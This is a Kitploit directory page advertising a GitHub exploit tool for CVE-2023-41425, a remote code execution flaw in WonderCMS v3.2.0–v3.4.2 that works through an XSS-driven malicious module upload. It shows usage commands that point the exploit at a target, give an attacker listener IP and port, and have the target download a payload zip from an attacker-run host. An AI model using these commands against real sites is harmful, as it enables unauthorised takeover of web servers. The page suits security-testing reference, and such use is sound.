Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-41425 — WonderCMS RCE CVE-2023-41425 | Kitploit
Tools/GitHubGitHub/twappz/cve-2023-41425
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubtwappz/cve-2023-41425

CVE-2023-41425

WonderCMS RCE CVE-2023-41425

View Repository
12 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

RCE for WonderCMS versions v3.2.0 to v3.4.2

WonderCMS versions v3.2.0 to v3.4.2 with XSS vulnerability allow a malicious actor to achieve RCE by uploading a component to the installModule CVE-2023-41425 (No need to know the password).

Features:

  • Automated exploitation of CVE-2023-41425
  • Ease of specifying the remote host where the zip is downloaded from

Usage/Examples

Specifying the remote host from where the main.zip file is downloaded

root@kitploit:~
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321 -r http://10.10.14.110:8000/main.zip

OR not specifying the main.zip file. By default, it downloads from main.zip

root@kitploit:~
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321

Screenshots

Useage Useage

🔗 Links

my website youtube twitter instagram Hack the box

Download Tool